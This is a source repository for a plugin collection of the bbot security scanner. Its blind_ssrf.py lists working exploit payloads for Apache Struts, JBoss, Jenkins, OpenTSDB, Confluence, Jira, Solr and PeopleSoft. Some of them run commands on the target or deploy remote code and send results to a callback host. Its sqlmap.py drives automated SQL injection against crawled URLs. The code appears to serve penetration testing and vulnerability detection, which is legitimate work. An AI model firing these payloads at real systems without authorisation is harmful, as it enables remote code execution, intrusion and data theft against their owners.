├── .github
└── workflows
│ ├── lint.yml
│ └── tests.yml
├── LICENSE
├── README.md
├── blind_ssrf.py
└── sqlmap.py
/.github/workflows/lint.yml:
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1 | name: lint
2 |
3 | on: [push, pull_request]
4 |
5 | jobs:
6 | lint:
7 | runs-on: ubuntu-latest
8 | steps:
9 | - uses: actions/checkout@v2
10 | - uses: psf/black@stable
11 | with:
12 | options: "--check -l 119"
13 | - name: Install Python 3
14 | uses: actions/setup-python@v1
15 | with:
16 | python-version: 3.9
17 | - name: Install dependencies
18 | run: |
19 | pip install flake8
20 | - name: flake8
21 | run: |
22 | flake8 --select F,E722 --ignore F403,F405,F541 --per-file-ignores="*/__init__.py:F401,F403"
23 |
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/.github/workflows/tests.yml:
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1 | name: Module Tests
2 | on: [push, pull_request]
3 | jobs:
4 | tests:
5 | runs-on: ubuntu-latest
6 | steps:
7 | - name: Clone bbot
8 | uses: actions/checkout@v3
9 | with:
10 | repository: blacklanternsecurity/bbot
11 | - name: Clone bbot-module-playground
12 | uses: actions/checkout@v3
13 | with:
14 | path: bbot/modules/playground
15 | - name: Install Python 3
16 | uses: actions/setup-python@v3
17 | with:
18 | python-version: 3.9
19 | - name: Install dependencies
20 | run: |
21 | pip install poetry
22 | poetry install
23 | - name: Run tests with pytest
24 | run: |
25 | poetry run pytest --disable-warnings -k test_modules
26 |
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1 | # BBOT Module Playground
2 |
3 | [](https://www.python.org) [](https://github.com/psf/black) [](https://github.com/blacklanternsecurity/bbot-module-playground/blob/dev/LICENSE) [](https://github.com/blacklanternsecurity/bbot/actions?query=workflow%3A"tests")
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/blind_ssrf.py:
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1 | # https://github.com/assetnote/blind-ssrf-chains
2 | from bbot.core.errors import InteractshError
3 | from bbot.modules.generic_ssrf import generic_ssrf, BaseSubmodule
4 |
5 |
6 | class ApacheStruts(BaseSubmodule):
7 |
8 | technique_description = "Apache Struts (S2-016)"
9 | severity = "CRITICAL"
10 | paths = [
11 | '?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{\'command\'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}'
12 | ]
13 |
14 |
15 | class JBoss(BaseSubmodule):
16 |
17 | technique_description = "JBOSS Deploy WAR from URL"
18 | severity = "CRITICAL"
19 | paths = [
20 | "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war"
21 | ]
22 |
23 |
24 | class ConfluenceSharelinks(BaseSubmodule):
25 |
26 | technique_description = "Confluence Sharelinks"
27 | severity = "HIGH"
28 | paths = ["/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/"]
29 |
30 |
31 | class ConfluenceIconUriServlet(BaseSubmodule):
32 |
33 | technique_description = "Confluence < 6.1.3 (CVE-2017-9506)"
34 | severity = "HIGH"
35 | paths = ["/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY"]
36 |
37 |
38 | class JiraIconUriServlet(BaseSubmodule):
39 |
40 | technique_description = "Jira < 7.3.5 (CVE-2017-9506)"
41 | severity = "HIGH"
42 | paths = ["/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY"]
43 |
44 |
45 | class JiraMakeRequest(BaseSubmodule):
46 |
47 | technique_description = "Jira < 8.4.0 (CVE-2019-8451)"
48 | severity = "HIGH"
49 | paths = ["/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com"]
50 |
51 |
52 | class AtlassianIconUriServlet(BaseSubmodule):
53 |
54 | technique_description = "Atlassian iconUriServlet (CVE-2017-9506)"
55 | severity = "HIGH"
56 | paths = ["/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY"]
57 |
58 |
59 | class OpenTSDB(BaseSubmodule):
60 |
61 | technique_description = "OpenTSDB Remote Code Execution"
62 | severity = "CRITICAL"
63 | paths = [
64 | "/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png"
65 | ]
66 |
67 |
68 | class JenkinsCVE_2018_1000600(BaseSubmodule):
69 |
70 | technique_description = "Jenkins CVE-2018-1000600"
71 | severity = "MEDIUM"
72 | paths = [
73 | "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=user&password=pass"
74 | ]
75 |
76 |
77 | class JenkinsRCE(BaseSubmodule):
78 |
79 | technique_description = "Jenkins Unauthenticated RCE"
80 | severity = "CRITICAL"
81 | paths = [
82 | "/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='example.com', root='http://SSRF_CANARY/')%0a@Grab(group='com.example', module='poc', version='1')%0aimport example;"
83 | ]
84 |
85 |
86 | class JenkinsRCEViaGroovy(BaseSubmodule):
87 |
88 | technique_description = "Jenkins RCE Groovy"
89 | severity = "CRITICAL"
90 |
91 | def create_paths(self):
92 | return [
93 | '/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl http://SSRF_CANARY".execute()}}"'
94 | ]
95 |
96 |
97 | class Hystrix(BaseSubmodule):
98 |
99 | technique_description = "Spring Cloud Netflix CVE-2020-5412"
100 | severity = "MEDIUM"
101 | paths = ["/proxy.stream?origin=http://SSRF_CANARY/"]
102 |
103 |
104 | class W3TotalCache(BaseSubmodule):
105 |
106 | technique_description = "W3 Total Cache Arbitrary File Read (CVE-2019-6715)"
107 | severity = "HIGH"
108 | paths = ["/wp-content/plugins/w3-total-cache/pub/sns.php"]
109 |
110 | def test(self, event):
111 |
112 | subdomain_tag = self.parent_module.helpers.rand_string(4)
113 | for test_path in self.test_paths:
114 | put_data = {
115 | "Type": "SubscriptionConfirmation",
116 | "Message": "",
117 | "SubscribeURL": "https://SSRF_CANARY".replace(
118 | "SSRF_CANARY",
119 | f"{subdomain_tag}.{self.parent_module.interactsh_domain}",
120 | ),
121 | }
122 | test_url = f"{event.parsed.scheme}://{event.parsed.netloc}{test_path}"
123 | r = self.parent_module.helpers.curl(url=test_url, method="PUT", post_data=put_data)
124 | if r:
125 | self.process(event, r, subdomain_tag)
126 |
127 |
128 | class WeblogicUDDIExplorer(BaseSubmodule):
129 |
130 | technique_description = "UDDI Explorer (CVE-2014-4210)"
131 | severity = "MEDIUM"
132 | paths = [
133 | "/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
134 | ]
135 |
136 |
137 | class ApacheSolrShards(BaseSubmodule):
138 |
139 | technique_description = "Apache SOLR Shards Param"
140 | severity = "MEDIUM"
141 | paths = [
142 | '/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}',
143 | "/solr/db/select?q=var&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json",
144 | "/xxx?q=aaa%26shards=http://SSRF_CANARY/solr",
145 | "/xxx?q=aaa&shards=http://SSRF_CANARY/solr",
146 | ]
147 |
148 |
149 | class ApacheSolrXXE(BaseSubmodule):
150 |
151 | technique_description = "Apache Solr XXE (2017)"
152 | severity = "MEDIUM"
153 | paths = [
154 | "/solr/gettingstarted/select?q={!xmlparser v='",
155 | "/xxx?q={!type=xmlparser v=\"\"}",
156 | ]
157 |
158 |
159 | class PeopleSoftXXE_1(BaseSubmodule):
160 |
161 | technique_description = "PeopleSoft XXE 1"
162 | severity = "HIGH"
163 | paths = ["/PSIGW/HttpListeningConnector"]
164 |
165 | def test(self, event):
166 |
167 | subdomain_tag = self.parent_module.helpers.rand_string(4)
168 |
169 | post_body = """
170 |
171 |
173 | ]>
174 |
175 | &x;
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 | your_message_content]]>
194 |
195 |
196 |
197 |
198 | """.replace(
199 | "SSRF_CANARY", f"{subdomain_tag}.{self.parent_module.interactsh_domain}"
200 | )
201 | for test_path in self.test_paths:
202 | test_url = f"{event.parsed.scheme}://{event.parsed.netloc}{test_path}"
203 | r = self.parent_module.helpers.curl(
204 | url=test_url,
205 | method="POST",
206 | raw_data=post_body,
207 | headers={"Content-type": "application/xml"},
208 | )
209 | if r:
210 | self.process(event, r, subdomain_tag)
211 |
212 |
213 | class PeopleSoftXXE_2(BaseSubmodule):
214 |
215 | technique_description = "PeopleSoft XXE 2"
216 | severity = "HIGH"
217 | paths = ["/PSIGW/PeopleSoftServiceListeningConnector"]
218 |
219 | def test(self, event):
220 | subdomain_tag = self.parent_module.helpers.rand_string(4)
221 |
222 | for test_path in self.test_paths:
223 | post_body = """""".replace(
224 | "SSRF_CANARY",
225 | f"{subdomain_tag}.{self.parent_module.interactsh_domain}",
226 | )
227 | test_url = f"{event.parsed.scheme}://{event.parsed.netloc}{test_path}"
228 | r = self.parent_module.helpers.curl(
229 | url=test_url,
230 | method="POST",
231 | raw_body=post_body,
232 | headers={"Content-type": "application/xml"},
233 | )
234 | if r:
235 | self.process(event, r, subdomain_tag)
236 |
237 |
238 | class blind_ssrf(generic_ssrf):
239 |
240 | watched_events = ["URL"]
241 | produced_events = ["VULNERABILITY"]
242 | flags = ["active", "aggressive", "web-advanced"]
243 | meta = {"description": "Check for common blind SSRFs"}
244 | deps_apt = ["curl"]
245 |
246 | in_scope_only = True
247 |
248 | def setup(self):
249 |
250 | self.scanned_hosts = set()
251 | self.interactsh_subdomain_tags = {}
252 | self.severity = None
253 | self.generic_only = self.config.get("generic_only", False)
254 |
255 | if self.scan.config.get("interactsh_disable", False) == False:
256 | try:
257 | self.interactsh_instance = self.helpers.interactsh()
258 | self.interactsh_domain = self.interactsh_instance.register(callback=self.interactsh_callback)
259 | except InteractshError as e:
260 | self.warning(f"Interactsh failure: {e}")
261 | return False
262 | else:
263 | self.warning(
264 | "The blind_ssrf module is completely dependent on interactsh to function, but it is disabled globally. Aborting."
265 | )
266 | return None
267 |
268 | # instantiate submodules
269 | self.submodules = {}
270 | for m in BaseSubmodule.__subclasses__():
271 | if not m.__name__.startswith("Generic_"):
272 | self.verbose(f"Starting blind_ssrf submodule: {m.__name__}")
273 | self.submodules[m.__name__] = m(self)
274 | return True
275 |
276 | def handle_event(self, event):
277 |
278 | host = f"{event.parsed.scheme}://{event.parsed.netloc}/"
279 | host_hash = hash(host)
280 | if host_hash in self.scanned_hosts:
281 | self.debug(f"Host {host} was already scanned, exiting")
282 | return
283 | else:
284 | self.scanned_hosts.add(host_hash)
285 |
286 | self.test_submodules(self.submodules, event)
287 |
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/sqlmap.py:
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1 | from bbot.modules.base import BaseModule
2 |
3 |
4 | class sqlmap(BaseModule):
5 |
6 | watched_events = ["URL"]
7 | produced_events = ["FINDING", "VULNERABILITY"]
8 | flags = ["active", "aggressive", "web-advanced", "slow", "brute-force", "deadly"]
9 | meta = {"description": "Unleash SQLMAP against unsuspecting web applications"}
10 |
11 | options = {"smart_mode": True, "level": "1", "risk": "1", "crawl": "2"}
12 | options_desc = {
13 | "smart_mode": "Perform thorough tests only if positive heuristic(s) STRONGLY RECOMMENDED",
14 | "level": "Level of tests to perform (1-5, default 1)",
15 | "risk": "Risk of tests to perform (1-3, default 1)",
16 | "crawl": "Sets the max crawl depth for looking for additional links. 0 will disable the feature.",
17 | "tamper": "Use given script(s) for tampering injection data (comma separated)",
18 | }
19 |
20 | in_scope_only = True
21 |
22 | deps_ansible = [
23 | {
24 | "name": "Get SQLMAP repo",
25 | "git": {
26 | "repo": "https://github.com/sqlmapproject/sqlmap.git",
27 | "dest": "{BBOT_TOOLS}/sqlmap",
28 | },
29 | }
30 | ]
31 |
32 | def setup(self):
33 | sqlmap_warned = False
34 | for m in self.scan.modules.values():
35 |
36 | if "URL" in m.produced_events and sqlmap_warned == False:
37 | if str(m) != "httpx":
38 | sqlmap_warned = True
39 | self.hugewarning(
40 | "Warning! Running SQLMAP module with non-httpx URL event producers could produce undesirable effects! Proceed with caution!"
41 | )
42 |
43 | self.crawl = self.config.get("crawl", "2")
44 | self.level = self.config.get("level", "1")
45 | self.risk = self.config.get("risk", "1")
46 | self.smart_mode = self.config.get("smart_mode", True)
47 | self.tamper = self.config.get("tamper", "")
48 |
49 | self.hugeinfo(self.smart_mode)
50 | self.hugeinfo(self.crawl)
51 | self.hugeinfo(self.level)
52 |
53 | return True
54 |
55 | def handle_event(self, event):
56 |
57 | command = [
58 | "python",
59 | f"{self.scan.helpers.tools_dir}/sqlmap/sqlmap.py",
60 | f"{event.data}",
61 | "--batch",
62 | "--forms",
63 | "--flush-session",
64 | "--user-agent",
65 | f"{self.scan.useragent}",
66 | "--level",
67 | f"{self.level}",
68 | "--risk",
69 | f"{self.risk}",
70 | "--crawl",
71 | f"{self.crawl}",
72 | ]
73 |
74 | if self.smart_mode:
75 | command.append("--smart")
76 |
77 | if self.tamper:
78 | command.append(f'--tamper="{self.tamper}"')
79 |
80 | # This is really ugly, yes!
81 | # Why can't there by a json output mode?
82 |
83 | vuln_dict = {}
84 | expect_vuln = False
85 | for f in self.helpers.run_live(command):
86 |
87 | if "(XSS) test shows that" in f and "might be vulnerable to cross" in f:
88 | parameter = f.split("'")[1]
89 |
90 | self.emit_event(
91 | {
92 | "host": str(event.host),
93 | "url": event.data,
94 | "description": f"Possible XSS Injection parameter: [{parameter}]",
95 | },
96 | "FINDING",
97 | event,
98 | )
99 |
100 | if "appears to be" in f and "injectable" in f:
101 |
102 | parameter = f.split("'")[1]
103 | technique = f.split("'")[3]
104 |
105 | self.emit_event(
106 | {
107 | "host": str(event.host),
108 | "url": event.data,
109 | "description": f"Possible SQL Injection parameter: [{parameter}] technique: [{technique}]",
110 | },
111 | "FINDING",
112 | event,
113 | )
114 |
115 | if expect_vuln == False and "sqlmap identified the following injection point(s)" in f:
116 | expect_vuln = True
117 |
118 | if expect_vuln == True:
119 |
120 | if "do you want to exploit" in f:
121 | vuln_dict = {}
122 | expect_vuln = False
123 |
124 | elif ":" in f:
125 | parsed_line = f.strip().split(":")
126 | vuln_dict[parsed_line[0].strip().replace(":", "")] = parsed_line[1].strip()
127 |
128 | if "Parameter" in vuln_dict and "Type" in vuln_dict and "Title" in vuln_dict and "Payload" in vuln_dict:
129 |
130 | self.emit_event(
131 | {
132 | "severity": "HIGH",
133 | "host": str(event.host),
134 | "url": str(event.data),
135 | "description": f"SQL Injection Type: [{vuln_dict['Type']}] Title: [{vuln_dict['Title']}] Payload: [{vuln_dict['Payload']}]",
136 | },
137 | "VULNERABILITY",
138 | event,
139 | )
140 |
141 | del vuln_dict["Type"]
142 | del vuln_dict["Title"]
143 | del vuln_dict["Payload"]
144 |
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